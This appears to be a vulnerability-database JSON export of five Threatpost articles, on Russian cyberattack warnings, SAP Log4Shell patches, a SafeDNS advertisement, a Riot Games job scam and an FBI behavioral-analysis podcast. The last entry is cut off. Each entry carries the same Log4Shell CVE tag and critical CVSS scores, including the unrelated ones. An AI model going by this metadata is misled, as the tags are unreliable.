{"threatpost": [{"lastseen": "2022-03-22T16:34:37", "description": "The Russian government is exploring \u201coptions for potential cyberattacks\u201d on critical infrastructure in the U.S., the White House warned on Monday, in retaliation for sanctions and other punishments as the war in Ukraine grinds on.\n\nOfficials said that its latest intelligence shows cyber-related \u201cpreparatory activity\u201d on the part of President Vladimir Putin\u2019s government, though White House deputy national security adviser for cyber and emerging technology Anne Neuberger emphasized that no concrete threat has been identified.\n\n\u201cTo be clear, there is no certainty there will be a cyber-incident on critical infrastructure,\u201d she told reporters [during a briefing](<https://thehill.com/homenews/administration/599072-white-house-warns-russia-prepping-possible-cyberattacks-on-us?rl=1>). She added, \u201cThere is no evidence of any specific cyberattack that we are anticipating. There is some preparatory activity that we\u2019re seeing and that is what we shared in a classified context with companies who we thought might be affected.\u201d\n\nThat observed prep work includes vulnerability scanning and website probing, she added, declining to add any specifics. 
She noted that officials were holding more detailed classified briefings with organizations they believe could be targeted.\n\n\u201cThe current conflict has put cybersecurity initiatives in hyperdrive, and today, industry leaders aren\u2019t just concerned about adversaries breaching critical infrastructure but losing access and control to them,\u201d Saket Modi, co-founder and CEO at Safe Security, said via email.\n\nIn tandem with the briefing, the White House released a cyber-preparedness fact sheet, and President Joe Biden [issued the following statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/>):\n\n_\u201cI have previously warned about the potential that Russia could conduct malicious cyber activity against the United States, including as a response to the unprecedented economic costs we\u2019ve imposed on Russia alongside our allies and partners. It\u2019s part of Russia\u2019s playbook. Today, my Administration is reiterating those warnings based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks.\u201d_\n\nThe [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/fact-sheet-act-now-to-protect-against-potential-cyberattacks/>) contains basic advice for hardening cyber-defenses, including employee awareness education; implementing multifactor authentication; keeping patching up-to-date; ensuring backups for data; turning on encryption; red-team exercises; and updating security tools.\n\n\u201cThis is a call to action and a call to responsibility for all of us,\u201d Neuberger said, again citing a \u201cpotential shift in intention\u201d by Russia.\n\n## **Organizations Are Not Prepared for Russian Attacks**\n\nJason Rebholz, CISO at Corvus Insurance, noted that basic cyber-hardening should have begun long ago.\n\n\u201cThe White House\u2019s best practices echo security fundamentals 
\u2013 something every organization should strive for,\u201d he said via email. \u201cFor many organizations, the time to implement was several years ago, as the frequency and severity of attacks began to escalate. Like planting a tree, the best time to secure your organization was ten years ago. The next best time is today. Organizations that have not addressed the key items and hardened their cyber-defenses are at a significantly greater risk of compromise.\u201d\n\nBeyond the basics, there are other challenges in being prepared for an onslaught from Russia\u2019s [considerable cyber-arsenal](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>), Modi said.\n\n\u201cWhile governments and businesses have started pivoting towards proactive cybersecurity, it is difficult to do so without addressing the three major challenges in cybersecurity that organizations face,\u201d he explained. \u201cThere are too many cybersecurity products that do not communicate with each other, and this siloed approach leads to managing cybersecurity reactively. Finally, despite increased attention on the need for a better disclosure mechanism of cyberattacks, cybersecurity communication continues to be a challenge since it often lacks a business context.\u201d\n\nMeanwhile, Danny Lopez, CEO at Glasswall, pointed out that the real risk involves zero-day exploits and other unknown threats.\n\n\u201cPutin is playing a long game. War is costly both in terms of human and economic terms. If we see a de-escalation of the situation on the ground, we are likely to see an escalation of cyber warfare,\u201d he told Threatpost. \u201cThere are no patches for [unknown zero-day] and they wreak havoc within hours, whilst the security services and technology industry tries to catch up. 
These are extremely dangerous to governments as well as businesses.\u201d\n\nThe bottom line is that organizations should assume that attacks are imminent, researchers concluded.\n\n\u201cIt is a confusing time that involves two nations that have historically possessed and demonstrated very good skills in the cybersecurity and cybercrime areas,\u201d noted Purandar Das, co-founder and CEO at Sotero, via email. \u201cCountries under duress have and will utilize cyberattacks as a way to retaliate and to get around sanctions. The U.S. being the face of such sanctions and a history of poorly protected infrastructure make it a tempting target. Add all this together and the warnings make a lot of sense.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T16:31:18", "type": "threatpost", "title": "Russia Lays Groundwork for Cyberattacks on U.S. 
Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T16:31:18", "id": "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "href": "https://threatpost.com/russia-cyberattacks-us-infrastructure/179037/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-15T20:20:39", "description": "SAP has identified 32 apps that are affected by [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 the critical vulnerability in the Apache Log4j Java-based logging library that\u2019s been [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) since last week.\n\nAs of yesterday, Patch Tuesday, the German software maker reported that it\u2019s already patched 20 of those apps, and it\u2019s still feverishly working on fixes for 12. 
SAP provided workarounds for some of the pending patches in [this document](<https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf>), accessible to users on the company\u2019s support portal.\n\nThe news about Log4Shell has been nonstop, with the easily exploited, ubiquitous vulnerability spinning off even [more dangerous variations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), being associated with yet another [vulnerability in Apache\u2019s fast-baked patch](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) and threat actors jumping on it at a [global scale](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>).\n\nBetween Sunday and Wednesday morning ET, SAP had released 50 SAP Notes and Knowledge Base entries focusing on Log4j.\n\n## **Beyond \u2018Logapalooza\u2019: Other SAP Patch Tuesday Fixes**\n\nBut hard though it may be to believe, there are other SAP security matters to attend to besides Logapalooza, including fixes for other severe flaws in the company\u2019s products. On Tuesday, [SAP released](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021>) 21 new and updated security patches, including four HotNews Notes and six High Priority Notes.\n\n\u201cHotNews\u201d is the highest-severity rating that SAP doles out. Three of December\u2019s HotNews-rated bugs carried a CVSS rating of 9.9 (out of 10) and the fourth hit the top mark of 10.\n\nThomas Fritsch, an SAP security researcher at enterprise security firm Onapsis, said in his SAP Patch Tuesday [writeup](<https://onapsis.com/blog/sap-security-patch-day-december-2021-patch-day-shadow-log4j>) that the number of HotNews Notes may seem high, but one of them \u2013 [#3089831](<https://launchpad.support.sap.com/#/notes/3089831>), tagged with a CVSS score of 9.9 \u2013 was initially released on SAP\u2019s September 2021 Patch Tuesday. 
Covering an SQL-injection vulnerability in SAP NZDT Mapping Table Framework, the note was updated in the December Patch Tuesday batch with what Fritsch said was information about possible symptoms. \u201cSAP explicitly says that the update does not require any customer action,\u201d he noted.\n\nAnother of the HotNews Notes \u2013 [#2622660](<https://launchpad.support.sap.com/#/notes/2622660>) \u2013 is rated a top criticality of 10, but it\u2019s the continuously recurring HotNews Note that provides an SAP Business Client Patch with the latest tested Chromium fixes.\n\n\u201cSAP Business Client customers already know that updates of this note always contain important fixes that must be addressed,\u201d Fritsch said. \u201cThe note references 62 Chromium fixes with a maximum CVSS score of 9.6 \u2014 26 of them rated with High Priority. The last number only reflects vulnerabilities that were reported externally, as Google doesn\u2019t provide such information about internally detected issues.\u201d\n\nTaking these out, what\u2019s left of the most critical non-Log4Shell patches are a duo for SAP Commerce that were both released with a CVSS criticality of 9.9, and which are detailed below.\n\n### SAP HotNews Note Security Note [#3109577](<https://launchpad.support.sap.com/#/notes/3109577>)\n\nThis note is for a code-execution vulnerability in SAP Commerce, localization for China, that covers 11 related CVEs. SAP has tagged it with a CVSS score of 9.9. The note patches multiple code-execution vulnerabilities in the product. Fritsch noted that the localization for China package uses the open-source library [XStream](<https://x-stream.github.io/>): a simple library that serializes objects to XML and back again.\n\nSAP\u2019s note provides a patch for version 2001 of the localization for China package, meaning that SAP Commerce customers using a lower version need to upgrade before applying the patch, Fritsch said. 
He pulled out two things worth mentioning when comparing the note\u2019s CVEs with the patches listed on <https://x-stream.github.io/security.html>:\n\n * The provided SAP patch contains version 1.4.15 of the XStream library\n * Version 1.4.15 specifically patches Code Execution vulnerabilities, but following the XStream patch history, it also fixes two Denial-of-Service vulnerabilities and a Server-Side Request Forgery vulnerability\n\n\u201cAs a workaround, affected customers can also directly replace the affected XStream library file with its latest version,\u201d Fritsch advised.\n\n### SAP HotNews Note Security Note [#3119365](<https://launchpad.support.sap.com/#/notes/3119365>)\n\nThis one, which is also tagged with a CVSS score of 9.9, patches a code injection issue in a text extraction report of the Translation Tools of SAP ABAP Server & ABAP Platform.\n\nFound in Versions 701, 740, 750, 751, 752, 753, 754, 755, 756 and 804, the vulnerability allows an attacker with low privileges to execute arbitrary commands in the background, Fritsch explained. The fact that such an attacker would need at least a few privileges to exploit the vulnerability bumped its CVSS score down from 10, he said.\n\n\u201cThe provided patch just deactivates the affected coding,\u201d Fritsch continued. 
\u201cThe report is only used by SAP internally, was not intended for release, and does not impact existing functionality.\u201d\n\nThose who can access the note and who are interested in which report is affected can get that information in the \u201cCorrection Instructions\u201d section by activating the tab \u201cTADIR Entries,\u201d Fritsch said.\n\n## Notable SAP High Priority Notes\n\n### SAP Security Notes [#3114134](<https://launchpad.support.sap.com/#/notes/3114134>) and [#3113593](<https://launchpad.support.sap.com/#/notes/3113593>)\n\nSAP Commerce is also affected by these two notable High Priority notes.\n\nTagged with a CVSS score of 8.8, the first high-priority note addresses SAP Commerce installations configured to use an Oracle database, according to Fritsch. \u201cThe escaping of values passed to a parameterized \u201cin\u201d clause, in flexible search queries with more than 1000 values, is processed incorrectly,\u201d he explained. \u201cThis allows an attacker to execute crafted database queries through the injection of malicious SQL commands, thus exposing the backend database.\u201d\n\nSAP Commerce customers using the B2C Accelerator are also affected by SAP Security Note #3113593, tagged with a CVSS score of 7.5. The flaw can allow an attacker with direct write access to product-related metadata in B2C Accelerator to exploit a vulnerability in the jsoup library responsible for metadata sanitization before it\u2019s processed, Fritsch said, allowing the attacker to inflict long response delays and service interruptions that result in denial of service (DoS).\n\n### SAP Knowledge Warehouse High Priority Note [#3102769](<https://launchpad.support.sap.com/#/notes/3102769>)\n\nAnother high-priority note, in SAP Knowledge Warehouse (SAP KW), is #3102769, tagged with a CVSS score of 8.8. 
The note patches a cross-site scripting (XSS) vulnerability that can result in sensitive data being disclosed.\n\n\u201cThe vulnerability affects the displaying component of SAP KW and SAP explicitly points out that the pure existence of that component in the customer\u2019s landscape is all that is needed to be vulnerable,\u201d Fritsch cautioned.\n\nCustomers who don\u2019t actively use the displaying component of SAP KW may still experience a security breach, he noted.\n\nThe note details two possible workarounds:\n\n * Disabling the affected display component by adding a filter with a specific custom rule\n * Adding a rewrite rule to SAP Web Dispatcher to prevent redirects (this is only applicable if requests are routed via SAP Web Dispatcher)\n\n### SAP NetWeaver AS ABAP High Priority Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>)\n\nWith a CVSS score of 8.4, SAP Security Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>) describes a code injection vulnerability in two methods of a utility class in SAP NetWeaver AS ABAP.\n\n\u201cA highly privileged user with permissions to use transaction SE24 or SE80 and execute development objects is able to call these methods and provide malicious parameter values that can lead to the execution of arbitrary commands on the operating system,\u201d Fritsch elucidated.\n\nSAP fixed the problem by integrating the affected methods directly into the class without the possibility of passing parameters to those methods. Fritsch said that the affected classes and methods are available in the \u201cCorrection Instructions\u201d section by selecting the tab \u201cTADIR Entries.\u201d\n\n### SAF-T Framework SAP High Priority Security Note [#3124094](<https://launchpad.support.sap.com/#/notes/3124094>)\n\nThis one, which patches a directory-traversal vulnerability in the SAF-T framework, is tagged with a CVSS score of 7.7. 
It addresses an issue with the SAF-T framework, which is used to convert SAP tax data into the Standard Audit File Tax format (SAF-T) \u2013 an OECD international standard for the electronic exchange of data that enables tax authorities of all countries to accept data for tax purposes \u2013 and back.\n\nThe note describes how an insufficient validation of path information in the framework allows an attacker to read the complete file-system structure, Fritsch explained.\n\n## Open-Source Libraries as the Weakest Link\n\nFritsch pointed to the Log4j vulnerability and the vulnerabilities described in SAP Security Notes #3109577 and #3113593 as demonstrating \u201cthat there is always a risk involved when using open-source libraries.\u201d\n\nBesides the Log4Shell elephant in the room, recent examples that prove his point about the risks entailed by relying on the security of outside code include, for example, the recent discovery of three [malicious packages hosted](<https://threatpost.com/malicious-pypi-code-packages/176971/>) in the Python Package Index (PyPI) code repository that collectively have more than 12,000 downloads: downloads that potentially translate into loads of poisoned applications.\n\nAnother of many examples of how the software supply chain has become an increasingly popular method of distributing malware cropped up last week, when a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>)\n\nExternal libraries are convenient, but are they worth the risk? You have to do the math to figure that out, Fritsch summed up: \u201cThe ability to implement new features in a short period of time is bought at the price of dependence on the security of the external libraries. 
Remember, a software product is only as secure as its weakest software component.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T19:31:30", "type": "threatpost", "title": "SAP Kicks Log4Shell Vulnerability Out of 20 Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T19:31:30", "id": "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "href": "https://threatpost.com/sap-log4shell-vulnerability-apps/177069/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-24T20:40:21", "description": "The demand for public Wi-Fi is increasing constantly due to the increase of smartphone owners and remote workers. Researchers at VPNMentor say that there are approximately 549 million Wi-Fi hotspots worldwide. Another survey by Semantic found that 87 percent of U.S. 
consumers have used the readily available public internet at a cafe, airport or hotel.\n\nConnecting to those hotspots is usually free of charge, but there is a risk of expensive losses. According to PwC, consumers expect companies to protect their data proactively; 92 percent of consumers say companies must be proactive about data protection, 82 percent agree that the government should regulate how companies use private data, and 72 percent think that businesses, not the government, are best equipped to protect them.\n\nWhile it is impossible to guarantee 100 percent protection on public Wi-Fi, there are certain measures that can be taken to significantly reduce the risk of cyberthreats over the network, and most countries have started requiring Wi-Fi providers to bundle cybersecurity protection with internet access in order to comply with the law. Compliance requirements differ from country to country. We have CIPA in the USA, IWF & Friendly Wi-Fi in the UK, and BpjM in Germany, but all of them tend to require the same thing, that is, filter inappropriate content and keep the user protected.\n\nWeb filtering is considered to be an all-in-one package solution that protects users from cyber-threats while filtering the internet from unwanted content. However, not all web filtering providers offer additional features.\n\nThere certainly are a few good players on the market, and SafeDNS is among the top ones according to Capterra.\n\n## SafeDNS for Wi-Fi Providers\n\nSafeDNS has a Resellers program for MSPs and Wi-Fi providers. The program is sold at a competitive price with volume-based and multi-year subscription discounts, and comes with a user-friendly admin panel to create and modify customers\u2019 accounts and 24/7 support that would be more than happy to assist you with related issues.\n\nSafeDNS cloud service for web content filtering can be deployed on a public Wi-Fi network in minutes. 
The service is managed 24/7 from anywhere on the internet via a centralized online dashboard. It allows you to deploy an individual filtering policy for every location you have. You can fine-tune the policies and change them for specific locations at any minute.\n\n## Benefits of SafeDNS\n\n * A volume-based discount for Wi-Fi providers, up to 40 percent.\n * Central admin panel to control and modify client\u2019s accounts.\n * White-label for Wi-Fi providers to promote their own brand (logo & domain).\n * Easy deployment and management that doesn\u2019t require any hardware.\n * API with full guides.\n * 24/7 friendly support (calls, email, live chat).\n * 14-day trial for each potential client you have.\n * Discount for friendly Wi-Fi certification.\n\n## Features of SafeDNS\n\n * Adblocking that blocks recurrent ads on your guests\u2019 screens that sometimes mask malware.\n * Enhanced protection against child sexual abuse.\n * Advanced threat intelligence against malicious content and phishing recourses.\n * Pre-defined categories; each can be blocked with a single click.\n * Granular block/allow lists, and \u201callow list only\u201d feature.\n * Anycast servers with low latency.\n * Agent roaming client.\n * Unlimited filtering policies per subscription.\n * User-friendly dashboard.\n * Public Wi-Fi usage policy compliance.\n * Monitoring and reporting system for marketing analytics and employee management.\n * Scheduled filter for different kinds of filtering on the day times.\n * Multi tenants per subscription.\n\nYou can register for the reseller plan using [this link](<https://www.safedns.com/trial/reseller/?utm_source=threatpost&utm_medium=article&utm_campaign=wifi_prov&utm_content=reseller_trial>), no deposit is necessary. 
You can test the service for up to 14 days and only start paying when you get the payment from your first client who uses our service.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T16:06:19", "type": "threatpost", "title": "Web Filtering & Compliances for Wi-Fi Providers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T16:06:19", "id": "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "href": "https://threatpost.com/web-filtering-and-compliances-for-wi-fi-providers/178532/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:22", "description": "Riot Games, the developer behind League of Legends, has filed a California lawsuit against scammers, whose identities aren\u2019t yet known, for ripping off job seekers with the promise of a gig with the company.\n\nUsually early in their careers and eager for a chance with a gaming company like Riot, job hunters are either targeted by a cybercriminal posing as a recruiter or with fake ads on popular employment sites like Indeed, Riot\u2019s filing 
explained.\n\nThis email submitted as part of Riot\u2019s lawsuit includes a fake listing for a video game artist/illustrator.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png>)\n\nSource:\n\nThen, the applicant is run through an imaginary interview process with questions that seem legit, like, \u201cWhy do you want to work at Riot Games?\u201d and, \u201cHonestly describe what kind of working conditions you thrive in.\u201d\n\nThe interview would often be conducted by chat and followed by a quick job offer.\n\nTo make things extra convincing, the fraudsters used contacts and other communications doctored-up with Riot branding, including convincing looking employment contracts.\n\nAfter the interview, there\u2019s just one step left for the interviewee \u2014 they are asked to send money for \u201cwork equipment\u201d like an iPad, which the interviewer assures the new hire will be refunded. Spoiler: they aren\u2019t going to be.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png>)\n\nSource: Polygon.\n\nRiot included copies of checks sent to the fraudsters by victims in its complaint, ranging from $2,400 to $4,300.\n\nRiot wasn\u2019t the only prominent gaming company used to lure in victims, Polygon reportedly heard from people approached by fake representatives of Rockstar Games and Manticore Games, according to its report.\n\n\u201c[The scam] is absolutely appalling,\u201d Riot\u2019s lawyers wrote in the complaint. \u201cTheir victims largely are young, na\u00efve, and want nothing more than to work for Riot, one of the most prestigious video-game companies in the world. 
Defendants prey on the hopes and dreams of these individuals in order to steal their identities and pillage their bank accounts.\u201d\n\nRiot Games representatives said in an interview with Polygon that the company isn\u2019t exactly sure how many people have already been [victimized by the phishing campaign](<https://www.polygon.com/22822273/riot-games-job-recruiting-scam-lawsuit>).\n\n## **Gamers and \u2018Dynamite Phishing\u2019**\n\nPhishing lure themes are fickle, and ebb and flow with the latest headlines. COVID-19, [Chipotle offers](<https://threatpost.com/chipotle-serves-up-lures/168279/>), easy [infrastructure legislation money](<https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/>), and now, dream gaming jobs, are all bait intended to elicit an emotional reaction and make otherwise rational people take action without thinking it through.\n\nLast summer, the Threat Intelligence Team at GreatHorn discovered a rise in business email compromise (BEC) attacks that sent X-rated material to people at work to try and trigger an emotional response, something the report called \u201cdynamite phishing.\u201d\n\n\u201cIt doesn\u2019t always involve explicit material, but the goal is to put the user off balance, frightened \u2013 any excited emotional state \u2013 to decrease the brain\u2019s ability to make rational decisions,\u201d according to the report.\n\nA fantasy job at a huge gaming company could certainly trigger a highly emotional response in the right person.\n\nThis fake gaming company job scam leverages both the so-called [Great Resignation](<https://hbr.org/2021/09/who-is-driving-the-great-resignation>) of 2021, which saw record-breaking numbers of workers looking for better gigs, as well as the [pandemic push to work-from-home](<https://threatpost.com/2020-work-for-home-shift-learned/162595/>). 
Now a call from a personal cell phone number, or a Zoom interview in someone\u2019s kitchen, doesn\u2019t seem all that unusual and fraudsters are taking advantage.\n\nGaming itself is under relentless attack. Last summer, Akamai Technologies found [attacks on gaming](<https://threatpost.com/attackers-gaming-industry/167183/>) web applications alone jumped by a staggering 340 percent in 2020.\n\nFrom [Grinchbots](<https://threatpost.com/pandemic-grinchbots-surge-activity/176898/>) scooping up vast swaths of the latest hardware inventory to last month\u2019s [back-to-back PlayStation 5 breaches](<https://threatpost.com/playstation-5-hacks-same-day/176240/>) and [malicious gaming apps](<https://threatpost.com/9m-androids-malware-games-huawei-appgallery/176581/>) lurking in marketplaces, this latest fake job fraud is just another way criminals are trying to exploit the enthusiasm of gamers.\n\nNow Riot hopes to use this lawsuit as a way to track down the cybercriminals and make it clear the company was not behind the scam, according to Riot attorney Dan Nabel.\n\n\u201cWe\u2019re upset that people who viewed Riot as their dream company, even if that\u2019s one person, had been defrauded through this scam,\u201d Nabel told Polygon. \u201cSecondarily, we felt a need to protect our employees who are having their identities impersonated.\u201d\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. **_[**_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
This **_[**_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_**, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.**_\n\n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T19:00:36", "type": "threatpost", "title": "'Appalling' Riot Games Job Fraud Takes Aim at Wallets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:00:36", "id": "THREATPOST:065F7608AC06475E765018E97F14998D", "href": 
"https://threatpost.com/riot-games-job-fraud/176950/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T14:11:27", "description": "Crooks are crooks, right?\n\nWhatever motivates serial violent offenders doesn\u2019t switch off when they stop mugging people and instead pick up a keyboard to transform into cyber actors who craft cyber threats.\n\nAt least, that was the thinking behind the 2012 creation of the FBI\u2019s Cyber Behavioral Analysis Center (CBAC).\n\n\u201cBehavioral characteristics and motivations of cybercriminals in the real world and virtual world are the same,\u201d said Crane Hassold, who helped to create the CBAC after spending more than 11 years as an FBI analyst, offering strategic and tactical analytical support to cyber, financial crime and violent crime cases. \u201cThe only thing that differentiates them is their choice to use a computer to facilitate a crime.\u201d\n\nDuring his stint at the FBI, Hassold researched a slew of cyber threat flavors: malware, network intrusions, denial-of-service attacks, botnets, phishing and hacktivism. He also served as a subject matter expert who trained others on collecting and analyzing open-source intelligence (OSINT) to identify investigative leads and adversary attribution. 
As well, Hassold spent his days scouring digital evidence to identify behavioral artifacts and investigative leads and reverse-engineering malicious code to better understand adversary motivations and tactics.\n\nNow, he\u2019s director of threat intelligence at cloud-native email security platform Abnormal Security.\n\nAfter having honed his skills in the behavioral analysis unit, Hassold now goes undercover to connect with attackers directly, unfettered by the red tape of working at a law enforcement agency.\n\nHe\u2019s got some interesting stories: stories about looking at cyber threats at a more human level, about delving into more than the tools, techniques and procedures (TTPs) \u2013 all those technical bells and whistles of cybercrime.\n\nHassold visited the Threatpost podcast recently to share his stories about using the concepts built by the FBI to understand how criminals exploit victims\u2019 behavior in [business email compromise (BEC)](<https://threatpost.com/bec-losses-top-18b/167148/>), about engaging with BEC actors (first covertly and then overtly), and more. As well, he shared some key findings from Abnormal\u2019s recent [report](<https://abnormalsecurity.com/resources/ransomware-victims-threat-actors>) about ransomware.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/MULTITRACK_MIXDOWN_020822_Crane_Hassold_Abnormal_Security.mp3>). For more podcasts, check out[ Threatpost\u2019s podcast site](<https://threatpost.com/category/podcasts/>).\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_ \n\n\n(Brought to you by [Specops Technology](<http://www.specopssoft.com/threatpost>). 
